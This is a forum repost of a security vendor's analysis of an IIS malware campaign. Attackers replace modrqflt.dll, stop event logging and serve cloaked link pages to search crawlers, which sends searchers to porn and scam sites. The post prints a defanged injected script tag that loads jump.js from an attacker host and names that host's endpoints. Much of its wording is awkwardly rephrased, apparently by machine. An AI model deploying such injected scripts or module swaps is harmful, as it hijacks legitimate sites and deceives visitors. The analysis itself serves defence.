小心！上当"蜘蛛"在线疯狂搞颜色，误点即刻掉入诈骗漩涡-天涯论坛

fny5jt9 发表于 2024-8-25 21:41:12

小心！上当"蜘蛛"在线疯狂搞颜色，误点即刻掉入诈骗漩涡

互联网信息服务（Internet Information Services）是由于微软机构供给的基于运行Microsoft Windows的互联网基本服务，大都数Windows系统服务器均有安装，常用来运行Web服务。而当这一底层架构被恶意黑客盯上，网络威胁自然随之而来。
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/c7eadd7b5c1e4440abb639f74f631a7a~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=%2FC6iLk0JSAAhqSnUum4XNwNP7Mc%3D" style="width: 50%; margin-bottom: 20px;"></div>
近期，360安全大脑独家发掘一新型恶意模块，被黑客移植其攻陷的IIS WEB服务器，并利用该恶意模块替换IIS服务中的一个服务组件，躲避检测查杀。经360安全大脑分析，这次攻击事件最早起始于2020年8月，黑客攻陷数个知名云服务供给商的数十台服务器，受影响网站数量高达几千例，360安全大脑第1时间发出紧急安全预警。
攻陷公用云主机服务器，"染毒蜘蛛"过境数千网站
360安全大脑分析发掘，被攻击服务器重点为公用云主机服务器，且一般黑客攻陷一个公用云主机服务器后，就可直接得到几十乃至上百个网站的掌控权，其中不乏企业官网。360安全大脑监测数据表示，此次遭攻击服务器高达数十台，几千个网站受波及。
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/6a7bd556ab96433e8c339ab59db2939c~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=razRl4N3n8DB56RchO858nbvIYE%3D" style="width: 50%; margin-bottom: 20px;">
 （部分受害企业）
</div>
鉴于以上状况，360安全大脑第1时间对样本展开分析，随后发掘黑客在攻陷目的服务器后，会从网上下载一个包括db.db、dd.cc、e.cc模块、x64.dd、x86.dd五个文件的恶意压缩包，各文件功能详细如下：
db.db 是一个SQLite3数据库文件。重点包括恶意模块需要的网站模版及关键字等信息，此文件后续会被写入IIS目录下的inetsrv\modrqflt.dll:db.db文件中，这是一个持有FILE_ATTRIBUTE_INTEGRITY_STREAM属性的文件，在目录下不可见。

dd.cc是黑客研发的恶意模块安装工具。黑客运用该工具可改变modrqflt.dll的拜访掌控权限(DACL)，从而成功将modrqflt.dll重命名为cache.dll，并将恶意程序改名为modrqflt.dll。
e.cc模块是用来停止被攻陷服务器日志记录的功能。运行之后，其会遍历线程找到Eventlog服务的线程并停止，以此来停止日志记录的功能。
x64.dd为黑客编写的64位恶意modrqflt.dll，重点用来替换C:\Windows\System32\inetsrv下iis服务器自带的modrqflt.dll。
x86.dd 则是黑客编写的32位恶意modrqflt.dll，重点用来替换C:\Windows\SysWOW64\inetsrv下的modrqflt.dll。
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/5f77069f7fe54eb980271f9fead12a4a~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=FwYiyrn0HinKPWFcQQJRh%2BHr2aM%3D" style="width: 50%; margin-bottom: 20px;">
 （黑客攻陷目的服务器后下载的恶意压缩包）
</div>
modrqflt.dll是供给请求过滤处理（Request filtering handler）的功能模块，而成功替换后，黑客便能够过滤掉网站正常拜访请求，专门为搜索引擎蜘蛛（爬虫）供给色情素材。
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/fe09099069904aef9e51cc5eb3ed77c5~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=hgHRszIOJaJCgo7EcIGMF2H9aTg%3D" style="width: 50%; margin-bottom: 20px;"></div>
完成恶意模块的替换后，当搜索引擎蜘蛛（爬虫）拜访网站本来失效链接时，此模块即会生成一个包括海量链接的"空白"页面，并将HTTP响应码由404改为200来诈骗"蜘蛛"（爬虫）。而"蜘蛛"在获取该页面后，会继续拜访页面中的所有链接，并抽取关键字存入搜索数据库。此时，倘若有用户搜索对应关键词，就会返回以上伪造链接及页面，倘若恶意DLL仍然存在，则会直接转到色情网站。
空白页面神隐"透明"网址，骗过爬虫蜘蛛猖狂搞颜色
404页面并不少见，一般是因为服务器位置变动，或守护不到位等原因引起网站个别链接失效。正常状况下，当搜索引擎蜘蛛爬取时遇到此类链接，亦会表示404页面，但针对遭遇黑客攻陷的网站来讲，其失效链接则会骗过"蜘蛛"，表示空白页面却在源码中暗藏海量链接。
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/d762de584e214539adeef42928dfc2c3~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=j1PFQnhtUQhbtey1gBxd%2ByFb%2FKY%3D" style="width: 50%; margin-bottom: 20px;"></div>
看到这儿你或许会有疑问，中招的网站怎么区分正常的用户和爬虫呢？其实当用户运用浏览器打开一个网站，浏览器向网站服务器发出请求时，会在请求数据头部设置一个User-Agent的字段，例如拜访百度时：
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/10588cdf13c347b6baee1403fba80e22~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=tFgCIFBrmOY6vwcdyqF1DUnfZkU%3D" style="width: 50%; margin-bottom: 20px;"></div>
而当搜索引擎爬取时，User-Agent设置的则有有些不同样：
百度蜘蛛
Mozilla/5.0(compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html）
360蜘蛛：
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider
神马蜘蛛：
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36
搜狗蜘蛛：
Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/83a8cb8d90cc4ea3938440eff9091538~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=%2BYZHqm0rnQ4HVFrCn3RsHKgQxhw%3D" style="width: 50%; margin-bottom: 20px;"></div>
此次事件中，违法黑客下载的恶意模块会经过判断User-Agent区分用户和蜘蛛（爬虫），当识别为搜索引擎蜘蛛后，就会返回以上100条链接，其中前80条hostname是恶意模块生成的随机页面，与当前网站的hostname一致；后20条hostname则是其他受害网站生成的随机页面，均为接口hxxp://zjclasjsdknlnxsa.com:8081/ping返回（此接口需要特殊User-Agent才可拜访）。

<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/a9c9ce4ddf7e4d21b19fbe95319f1b3a~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=sEHDG%2F0nCuVeLCDW58C0Na60YQA%3D" style="width: 50%; margin-bottom: 20px;"></div>
与此同期，100条随机生成的页面链接，看似杂乱无章其实暗藏必定规律的，它们的URL通常是由于下图中的规则形成，即[]中的为可选。
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/fa6a8efff5af41ea88e5d4c6fb450da9~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=HBVN9FK%2BU2fToaAX3RcnVLWZN98%3D" style="width: 50%; margin-bottom: 20px;"></div>
参照上图的URL规则，观察随机链接中的path字段会发掘，它们全都是以lista/xzs/api/bks开头，且以上四个关键词，分别对应了四套恶意模块运用网站模版。
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p6-sign.toutiaoimg.com/pgc-image/65dfef427be548b2a33aaad6144d8750~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=FIPvCwwub0gGyUCGzr7Nxxs4GNc%3D" style="width: 50%; margin-bottom: 20px;"></div>
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p26-sign.toutiaoimg.com/pgc-image/4e3c0e1fc5f14c0d84cd5c7d4a1a2b9d~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=zctMUbxpAbZ7OiZw5eAuqqck4CE%3D" style="width: 50%; margin-bottom: 20px;"></div>
在生成网页过程中，程序还会随机读取keyword等其他表中的数据，以此来替换网站模版中的对应留空位置。四套模版运行如下图所示：
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/237e434ea8794cc8b6ef386800991903~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=v8jL1kLWHF8WBJLLDCW3D01hNKo%3D" style="width: 50%; margin-bottom: 20px;"></div>
以上网页表示内容，都是拜访受害网址时数据库关键字替换随机生成的，搜索引擎蜘蛛（爬虫）则会将以上伪造的URL和页面缓存在数据库中。当用户在搜索引擎中搜索色情关键词，一旦命中以上伪造页面内容，那样搜索引擎就会返回以上伪造的URL和页面摘要。
此时，如若用户点击页面网址，浏览器则会默认设置Referer字段，以此来标明是从那个链接找到当前的链接。恶意模块正是利用这一点，区分当前拜访页面是不是来自于百度/360/搜狗/神马等国内搜索引擎中的一种。
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/2be097e515b948919efcc4b7348f2ce4~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=BmESXtIbaRCiq0YBHxMSfJ1XHLs%3D" style="width: 50%; margin-bottom: 20px;"></div>
尤其是，倘若接口hxxp://zjclasjsdknlnxsa.com:8081/jump有返回数据，则会设置页面的内容为接口返回的数据：
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p26-sign.toutiaoimg.com/pgc-image/011f9e57f34a42dface08bbbb9518cc0~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=T1NVnFeJBauKJOQRGxO3zyvdUeM%3D" style="width: 50%; margin-bottom: 20px;"></div>
如若无获取到接口数据，则会拜访db.db数据库，将jump中的代码插进网页中：
<script type="text/javascript" src="hxxp://zjclasjsdknlnxsa.com/js/jump.js"></script>
jump.js内容如下：
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/2ece40cd28ea4d7c9d0e9f9278562cef~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=rpiodM6A8krn%2FarK7Jw4oVcvGEE%3D" style="width: 50%; margin-bottom: 20px;"></div>
以上代码的重点功能便是转到最后的色情网站：
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/7e85f288b18b44adbebc4574a758495e~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=12BnzBokyAVYYM%2BhFiERB8Fa9%2F8%3D" style="width: 50%; margin-bottom: 20px;"></div>
而当咱们在某搜索引擎搜索受害网站关键词时，点击搜索的链接，打开的便是色情网址hxxps://2**sg.xyz/，虽然原网址完全是一个正规网站。
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/89246bf5b8e44b0286d5eaa9ae4882e7~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=2ou91uH5V5%2BhWvJodOTBmJsFyMo%3D" style="width: 50%; margin-bottom: 20px;">
 （搜索网址为色情网站）
</div>
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/40f3379dc8264c629c0a1cdf16cef293~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=iLUR1mzcC8hodlxgF4D3rWPOsDA%3D" style="width: 50%; margin-bottom: 20px;">
 （受害网站原网址为正规网站）
</div>
黑灰产业链连续发酵，360安全大脑强势出击
经360安全大脑研判分析，此次是黑灰产业链的连续性攻击事件，黑客团伙运用专业的渗透技术对各类网站进行攻击并移植木马，违法获取服务器掌控权，并在随意管控攻陷的肉鸡服务器的基本上，利用搜索引流扩散色情诈骗内容，影响正规网站正常业务运行。
现周期，黑客团伙攻击仍在连续，广大用户应格外警觉，避免遭受不必要的损失。对此，360安全大脑给出如下安全意见：
1、尽快前往weishi.360.cn，下载安装360安全卫士，有效拦截各类病毒木马攻击，守护电脑隐私及财产安全；
2、注重服务器安全管理，规范安全等级守护工作，即时更新漏洞补丁；
3、创立网站安全策略，防止攻击出现时害处进一步扩大。
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/992b715127ba48b4abdb83a0bfec16f9~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1725115046&x-signature=JuJE9YiMZRyMoJa41MyPpviFJgk%3D" style="width: 50%; margin-bottom: 20px;"></div>

nykek5i 发表于 2024-11-2 14:26:03

你说得对，我们一起加油，未来可期。

7wu1wm0 发表于 2024-11-9 03:06:04

回顾历史，我们不难发现：无数先辈用鲜血和生命铺就了中华民族复兴的康庄大道。

nykek5i 发表于 2024-11-13 14:16:32

我赞同你的看法，你的智慧让人佩服，谢谢分享。

页: [1]

天涯论坛's Archiver

小心！上当"蜘蛛"在线疯狂搞颜色，误点即刻掉入诈骗漩涡